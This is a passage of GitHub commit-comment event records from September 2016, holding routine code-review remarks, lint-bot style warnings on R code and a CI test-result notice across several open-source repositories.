{"id":"4588718550","type":"CommitCommentEvent","actor":{"login":"dieideeistgut"},"repo":{"name":"donovan6000/M33-Fio"},"payload":{"comment":{"id":19093788,"position":null,"line":null,"path":null,"commit_id":"e34484f0c41a7c3aef130e5813a8b9ebc7084447","created_at":"2016-09-20T10:14:34Z","updated_at":"2016-09-20T10:14:34Z","body":"Thanks a lot (ツ) 👍 "}},"created_at":"2016-09-20T10:14:34Z"}
{"id":"4588720342","type":"CommitCommentEvent","actor":{"login":"PedroLamas"},"repo":{"name":"PedroLamas/XamlStyler"},"payload":{"comment":{"id":19093791,"position":null,"line":null,"path":null,"commit_id":"81fce388695cb6921051fb47c5637dcf16c59338","created_at":"2016-09-20T10:14:58Z","updated_at":"2016-09-20T10:14:58Z","body":"Seems the `app.config` file was not checked in... My Visual Studio is complaining about it when I open the project!"}},"created_at":"2016-09-20T10:14:58Z"}
{"id":"4588722149","type":"CommitCommentEvent","actor":{"login":"flixr"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":19093795,"position":62,"line":169,"path":"sw/airborne/modules/computer_vision/opticflow_module.c","commit_id":"dc321aca0e2592c6d6621e3dee6227c80f42cbe3","created_at":"2016-09-20T10:15:21Z","updated_at":"2016-09-20T10:15:21Z","body":"better use direct assignment of struct than memcpy..."}},"created_at":"2016-09-20T10:15:21Z"}
{"id":"4588722242","type":"CommitCommentEvent","actor":{"login":"vladimir-kotikov"},"repo":{"name":"matrosovN/cordova-plugin-file"},"payload":{"comment":{"id":19093796,"position":7,"line":158,"path":"src/windows/FileProxy.js","commit_id":"4b935544f3aff3519cf49630cfcefd4ea60e2c04","created_at":"2016-09-20T10:15:22Z","updated_at":"2016-09-20T10:15:22Z","body":"Also pls. add a comment about why the replacement is needed and what kinds of strings this RE supposed to match (just to make code reading a bit easier)"}},"created_at":"2016-09-20T10:15:22Z"}
{"id":"4588722831","type":"CommitCommentEvent","actor":{"login":"PedroLamas"},"repo":{"name":"Xavalon/XamlStyler"},"payload":{"comment":{"id":19093799,"position":null,"line":null,"path":null,"commit_id":"81fce388695cb6921051fb47c5637dcf16c59338","created_at":"2016-09-20T10:15:29Z","updated_at":"2016-09-20T10:15:29Z","body":"Seems the app.config file was not checked in... My Visual Studio is complaining about it when I open the project!"}},"created_at":"2016-09-20T10:15:29Z"}
{"id":"4588724167","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/beastscriptr"},"payload":{"comment":{"id":19093800,"position":null,"line":null,"path":null,"commit_id":"f2432e693507248564442e545cd9deb4ed87e8cb","created_at":"2016-09-20T10:15:47Z","updated_at":"2016-09-20T10:15:47Z","body":"[R/beastscriptr.R:69:22:](https://github.com/richelbilderbeek/beastscriptr/blob/f2432e693507248564442e545cd9deb4ed87e8cb/R/beastscriptr.R#L69) *warning:* **no visible global function definition for ‘fasta_file_to_sequences’**\n```r\n​  sequences_table <- fasta_file_to_sequences(input_fasta_filename)\n                     ^~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-20T10:15:47Z"}
{"id":"4588725502","type":"CommitCommentEvent","actor":{"login":"gajus"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19093805,"position":2,"line":2,"path":"schemas/webpackOptionsSchema.json","commit_id":"8c3d97d933e0f895b344355c3f9f39081a290d94","created_at":"2016-09-20T10:16:03Z","updated_at":"2016-09-20T10:16:03Z","body":"@sokra we agreed to use spaces for the JSON file.\r\n\r\nhttps://github.com/webpack/webpack/blob/8292d2f6597925d6d37fd78b91f0b5cd3798a362/.editorconfig#L11-L13\r\n\r\nDo you want me to continue to use spaces or do you want me to use tabs?"}},"created_at":"2016-09-20T10:16:03Z"}
{"id":"4588725960","type":"CommitCommentEvent","actor":{"login":"acm909"},"repo":{"name":"acm909/miproyectogit"},"payload":{"comment":{"id":19093809,"position":1,"line":1,"path":"README.md","commit_id":"20aa2f6b8e71486d6b6ecb92e26f93c6e9e7f1b3","created_at":"2016-09-20T10:16:10Z","updated_at":"2016-09-20T10:16:10Z","body":"hola\r\n\r\n"}},"created_at":"2016-09-20T10:16:10Z"}
{"id":"4588727090","type":"CommitCommentEvent","actor":{"login":"flixr"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":19093810,"position":92,"line":208,"path":"sw/airborne/modules/computer_vision/opticflow_module.c","commit_id":"dc321aca0e2592c6d6621e3dee6227c80f42cbe3","created_at":"2016-09-20T10:16:23Z","updated_at":"2016-09-20T10:16:23Z","body":"assignment is preferred over memcpy: `opticflow_state.accel_imu_meas = *accel;`"}},"created_at":"2016-09-20T10:16:23Z"}
{"id":"4588730583","type":"CommitCommentEvent","actor":{"login":"jonjo-manywho"},"repo":{"name":"manywho/ManyWho_HTML5_Players2"},"payload":{"comment":{"id":19093817,"position":5,"line":221,"path":"js/services/utils.js","commit_id":"b28a4335f0930046d8b4164338ae00ae3cf09860","created_at":"2016-09-20T10:17:11Z","updated_at":"2016-09-20T10:17:11Z","body":"@matt-manywho you should be able to use `isNullOrUndefined` again here instead of duplicating :)"}},"created_at":"2016-09-20T10:17:11Z"}
{"id":"4588739265","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19093827,"position":37,"line":37,"path":"client/table/dataService.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T10:19:00Z","updated_at":"2016-09-20T10:19:00Z","body":"Разруливай ошибки в контроллере, наверное, лучше. В сервисе это не нужно делать, вдруг тебе понадобится при использовании этого сервиса отображать ошибки по-разному. В одном случае, например, вывести в консоль, в другом – показать пользователю. Лучше возвращать promise."}},"created_at":"2016-09-20T10:19:00Z"}
{"id":"4588741995","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/beastscriptr"},"payload":{"comment":{"id":19093832,"position":null,"line":null,"path":null,"commit_id":"9b40ea16a875bd8b77f48a7d11dc3e467caaeb31","created_at":"2016-09-20T10:19:34Z","updated_at":"2016-09-20T10:19:34Z","body":"[R/beastscriptr.R:69:22:](https://github.com/richelbilderbeek/beastscriptr/blob/9b40ea16a875bd8b77f48a7d11dc3e467caaeb31/R/beastscriptr.R#L69) *warning:* **no visible global function definition for ‘fasta_file_to_sequences’**\n```r\n​  sequences_table <- fasta_file_to_sequences(input_fasta_filename)\n                     ^~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-20T10:19:34Z"}
{"id":"4588742297","type":"CommitCommentEvent","actor":{"login":"InfernoZeus"},"repo":{"name":"bastimeyer/livestreamer-twitch-gui"},"payload":{"comment":{"id":19093834,"position":null,"line":null,"path":null,"commit_id":"039630be189b8edd4039338c8a3c12ddcf4253ce","created_at":"2016-09-20T10:19:38Z","updated_at":"2016-09-20T10:19:38Z","body":"Whoops, missed this notification. Done now!\r\n\r\n@scowalt @NGMarmaduke \r\n![Clubhouse?!](https://i.imgflip.com/vncvm.jpg)"}},"created_at":"2016-09-20T10:19:38Z"}
{"id":"4588744790","type":"CommitCommentEvent","actor":{"login":"andrewst"},"repo":{"name":"Xavalon/XamlStyler"},"payload":{"comment":{"id":19093839,"position":null,"line":null,"path":null,"commit_id":"81fce388695cb6921051fb47c5637dcf16c59338","created_at":"2016-09-20T10:20:09Z","updated_at":"2016-09-20T10:20:09Z","body":"My PR fix this."}},"created_at":"2016-09-20T10:20:09Z"}
{"id":"4588748788","type":"CommitCommentEvent","actor":{"login":"Tyilo"},"repo":{"name":"thomasmoelhave/tpie"},"payload":{"comment":{"id":19093852,"position":null,"line":null,"path":null,"commit_id":"42e5ffb31c853b47a39ba8105648b848001b7dbc","created_at":"2016-09-20T10:21:00Z","updated_at":"2016-09-20T10:21:00Z","body":"Is there any reason for using intrusive_ptr instead of shared_ptr for node_map?"}},"created_at":"2016-09-20T10:21:00Z"}
{"id":"4588751713","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19093863,"position":5,"line":5,"path":"encrypted-media/clearkey-mp4-setmediakeys-again-after-playback.html","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:21:38Z","updated_at":"2016-09-20T10:21:38Z","body":"I've removed these timeout meta elements from the other tests. I don't think we need long timeouts."}},"created_at":"2016-09-20T10:21:38Z"}
{"id":"4588754606","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19093867,"position":52,"line":52,"path":"encrypted-media/clearkey-mp4-setmediakeys-again-after-playback.html","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:22:16Z","updated_at":"2016-09-20T10:22:16Z","body":"The other tests all now rely on the default duration and only specify here if there is a need to override the default."}},"created_at":"2016-09-20T10:22:16Z"}
{"id":"4588755986","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19093872,"position":40,"line":40,"path":"encrypted-media/clearkey-mp4-setmediakeys-again-after-playback.html","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:22:35Z","updated_at":"2016-09-20T10:22:35Z","body":"Style in the rest of the tests is to have the .then at the end of the previous line."}},"created_at":"2016-09-20T10:22:35Z"}
{"id":"4588758681","type":"CommitCommentEvent","actor":{"login":"2ion"},"repo":{"name":"BunsenLabs/bunsen-pipemenus"},"payload":{"comment":{"id":19093875,"position":null,"line":null,"path":null,"commit_id":"64133dd99db0542dbbc4f739b7003a78af2ea477","created_at":"2016-09-20T10:23:12Z","updated_at":"2016-09-20T10:23:12Z","body":"Frankly, I do not see what sense removing +x from all the scripts makes. It just makes running scripts locally more annoying.\r\n\r\nPrior: Want to run script? ./$script. Now: Wanna run script? head -n1 $script -> written in language X -> $interpreter $script. "}},"created_at":"2016-09-20T10:23:12Z"}
{"id":"4588761897","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19093880,"position":350,"line":213,"path":"application/extensions/admin/grid/MassiveActionsWidget/assets/listActions.js","commit_id":"d4e753c2ab1b557ad2d8d6a3e88e8af6b3271f8a","created_at":"2016-09-20T10:23:56Z","updated_at":"2016-09-20T10:23:56Z","body":"Is `gridId` defined here?"}},"created_at":"2016-09-20T10:23:56Z"}
{"id":"4588762689","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19093883,"position":4,"line":41,"path":"encrypted-media/scripts/playback-persistent-usage-record.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:24:07Z","updated_at":"2016-09-20T10:24:07Z","body":"I guess you need to rebase on master to avoid these diff's against files with conflicts"}},"created_at":"2016-09-20T10:24:07Z"}
{"id":"4588763458","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19093884,"position":334,"line":197,"path":"application/extensions/admin/grid/MassiveActionsWidget/assets/listActions.js","commit_id":"d4e753c2ab1b557ad2d8d6a3e88e8af6b3271f8a","created_at":"2016-09-20T10:24:17Z","updated_at":"2016-09-20T10:24:17Z","body":"`$gridid` is not used."}},"created_at":"2016-09-20T10:24:17Z"}
{"id":"4588766041","type":"CommitCommentEvent","actor":{"login":"soumyanishan"},"repo":{"name":"bpramod/azure-linux-extensions"},"payload":{"comment":{"id":19093888,"position":14,"line":103,"path":"VMBackup/main/DiskUtil.py","commit_id":"a4daa63a8a984db1cf40e914f6f827518875c2d3","created_at":"2016-09-20T10:24:50Z","updated_at":"2016-09-20T10:24:50Z","body":"check for red hat and centos only"}},"created_at":"2016-09-20T10:24:50Z"}
{"id":"4588767985","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19093892,"position":2,"line":2,"path":"encrypted-media/scripts/setmediakeys-again-after-playback.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:25:16Z","updated_at":"2016-09-20T10:25:16Z","body":"Please add the qualifier parameter and use of `testnamePrefix` function following the pattern in the other script files."}},"created_at":"2016-09-20T10:25:16Z"}
{"id":"4588769362","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19093894,"position":350,"line":213,"path":"application/extensions/admin/grid/MassiveActionsWidget/assets/listActions.js","commit_id":"d4e753c2ab1b557ad2d8d6a3e88e8af6b3271f8a","created_at":"2016-09-20T10:25:34Z","updated_at":"2016-09-20T10:25:34Z","body":"cycles of dev... \r\nfeel free to clean the code. "}},"created_at":"2016-09-20T10:25:34Z"}
{"id":"4588773535","type":"CommitCommentEvent","actor":{"login":"bergetp"},"repo":{"name":"meltwater/puppet-es"},"payload":{"comment":{"id":19093907,"position":null,"line":null,"path":null,"commit_id":"db3e0eb3cb98d512df15e10c270681a6bbc87b7c","created_at":"2016-09-20T10:26:27Z","updated_at":"2016-09-20T10:26:27Z","body":"@garbelini I can't remember the context for this. Is this still something we should merge?"}},"created_at":"2016-09-20T10:26:27Z"}
{"id":"4588774338","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19093910,"position":20,"line":20,"path":"encrypted-media/scripts/setmediakeys-again-after-playback.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:26:39Z","updated_at":"2016-09-20T10:26:39Z","body":"For the other tests, I've aligned on using an `onFailure` function so that we can jus write `.catch(onFailure)`. See some other tests for pattern."}},"created_at":"2016-09-20T10:26:39Z"}
{"id":"4588784021","type":"CommitCommentEvent","actor":{"login":"bergetp"},"repo":{"name":"meltwater/puppet-es"},"payload":{"comment":{"id":19093928,"position":null,"line":null,"path":null,"commit_id":"3e10f0663462fa69c92bd59c9ab00739e090d6db","created_at":"2016-09-20T10:28:45Z","updated_at":"2016-09-20T10:28:45Z","body":"@rasjoh is this still relevant?"}},"created_at":"2016-09-20T10:28:45Z"}
{"id":"4588784498","type":"CommitCommentEvent","actor":{"login":"matt-manywho"},"repo":{"name":"manywho/ManyWho_HTML5_Players2"},"payload":{"comment":{"id":19093929,"position":5,"line":221,"path":"js/services/utils.js","commit_id":"b28a4335f0930046d8b4164338ae00ae3cf09860","created_at":"2016-09-20T10:28:52Z","updated_at":"2016-09-20T10:28:52Z","body":"@jonjo-manywho Oh yeah, I must be going blind"}},"created_at":"2016-09-20T10:28:52Z"}
{"id":"4588786206","type":"CommitCommentEvent","actor":{"login":"antonioborondo"},"repo":{"name":"leeboy1984/getTweetsByHashtag"},"payload":{"comment":{"id":19093931,"position":7,"line":3,"path":"config.php","commit_id":"ce0055c071ea4ad31cd8015a93f7efa1b376e32c","created_at":"2016-09-20T10:29:18Z","updated_at":"2016-09-20T10:29:18Z","body":"Don't make public the keys in GitHub! :-1: "}},"created_at":"2016-09-20T10:29:18Z"}
{"id":"4588787423","type":"CommitCommentEvent","actor":{"login":"tymekpudlik"},"repo":{"name":"smsapi/smsapi-javascript-client"},"payload":{"comment":{"id":19093933,"position":null,"line":null,"path":null,"commit_id":"1fa17c7877932478d1e058dc153c4517b21735f8","created_at":"2016-09-20T10:29:35Z","updated_at":"2016-09-20T10:29:35Z","body":"Z tego co wiem, to niezależnie od statusu elementy payloadu są dostępne."}},"created_at":"2016-09-20T10:29:35Z"}
{"id":"4588787465","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19093934,"position":350,"line":213,"path":"application/extensions/admin/grid/MassiveActionsWidget/assets/listActions.js","commit_id":"d4e753c2ab1b557ad2d8d6a3e88e8af6b3271f8a","created_at":"2016-09-20T10:29:36Z","updated_at":"2016-09-20T10:29:36Z","body":"Sure. Just want to make sure that I'm not removing anything crucial (gridId could e.g. be defined in another script)."}},"created_at":"2016-09-20T10:29:36Z"}
{"id":"4588789460","type":"CommitCommentEvent","actor":{"login":"xamgore"},"repo":{"name":"aNNiMON/Own-Programming-Language-Tutorial"},"payload":{"comment":{"id":19093941,"position":26,"line":26,"path":"src/com/annimon/ownlang/parser/ast/BinaryExpression.java","commit_id":"a1c16e9d42f16cb9e3828ea93bd4cd67cf06a7eb","created_at":"2016-09-20T10:30:05Z","updated_at":"2016-09-20T10:30:05Z","body":"Почему не бросаешь ошибку здесь? "}},"created_at":"2016-09-20T10:30:05Z"}
{"id":"4588790503","type":"CommitCommentEvent","actor":{"login":"antonioborondo"},"repo":{"name":"leeboy1984/getTweetsByHashtag"},"payload":{"comment":{"id":19093945,"position":6,"line":6,"path":"configClass.php","commit_id":"ce0055c071ea4ad31cd8015a93f7efa1b376e32c","created_at":"2016-09-20T10:30:18Z","updated_at":"2016-09-20T10:30:18Z","body":"Same problem as https://github.com/leeboy1984/getTweetsByHashtag/commit/ce0055c071ea4ad31cd8015a93f7efa1b376e32c#commitcomment-19093931 :-1: "}},"created_at":"2016-09-20T10:30:18Z"}
{"id":"4588795283","type":"CommitCommentEvent","actor":{"login":"cuitoldfish"},"repo":{"name":"arduino/Arduino"},"payload":{"comment":{"id":19093960,"position":23,"line":496,"path":"hardware/arduino/avr/cores/arduino/USBCore.cpp","commit_id":"2c5dd2029807a7d3fe76ed86a81643db088b5c2c","created_at":"2016-09-20T10:31:22Z","updated_at":"2016-09-20T10:31:22Z","body":" because the wLength for device descriptor should not be 8 in normal case, the following code pieces shows arduino generally send USB_DeviceDescriptor but not  USB_DeviceDescriptorB which conform with  IAD specification.. \r\n\r\n```.cpp\r\n\tif (USB_DEVICE_DESCRIPTOR_TYPE == t)\r\n\t{\r\n\t\tif (setup.wLength == 8)\r\n\t\t\t_cdcComposite = 1;\r\n\t\tdesc_addr = _cdcComposite ?  (const u8*)&USB_DeviceDescriptorB : (const u8*)&USB_DeviceDescriptor;\r\n\t}\r\n\r\n```"}},"created_at":"2016-09-20T10:31:22Z"}
{"id":"4588795464","type":"CommitCommentEvent","actor":{"login":"okraft"},"repo":{"name":"dyc87112/SpringBoot-Learning"},"payload":{"comment":{"id":19093962,"position":45,"line":45,"path":"Chapter1/pom.xml","commit_id":"ccc6a1bac30c8de22d2d39343cc177cfeb1ee45a","created_at":"2016-09-20T10:31:25Z","updated_at":"2016-09-20T10:31:25Z","body":"test"}},"created_at":"2016-09-20T10:31:25Z"}
{"id":"4588796300","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19093964,"position":null,"line":null,"path":null,"commit_id":"8cfc43ed51da94fac8a535820acc8fa8a39e52c2","created_at":"2016-09-20T10:31:37Z","updated_at":"2016-09-20T10:31:37Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (2201 of 2475 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8cfc43ed51da94fac8a535820acc8fa8a39e52c2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8cfc43ed51da94fac8a535820acc8fa8a39e52c2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.93%25-red.svg)</a> \n"}},"created_at":"2016-09-20T10:31:37Z"}
{"id":"4588797012","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19093968,"position":null,"line":null,"path":null,"commit_id":"52c66053b34be6c530046e499be5bff5219ffec7","created_at":"2016-09-20T10:31:46Z","updated_at":"2016-09-20T10:31:46Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:88:6:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:89:7:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L89) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L91) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:18:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:18:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:18:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:13:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:102:17:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:16:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:16:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:16:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:111:21:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L111) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:112:26:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L112) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:16:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L120) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:7:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L124) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:124:10:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:23:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L124) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:124:29:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:5:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L146) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           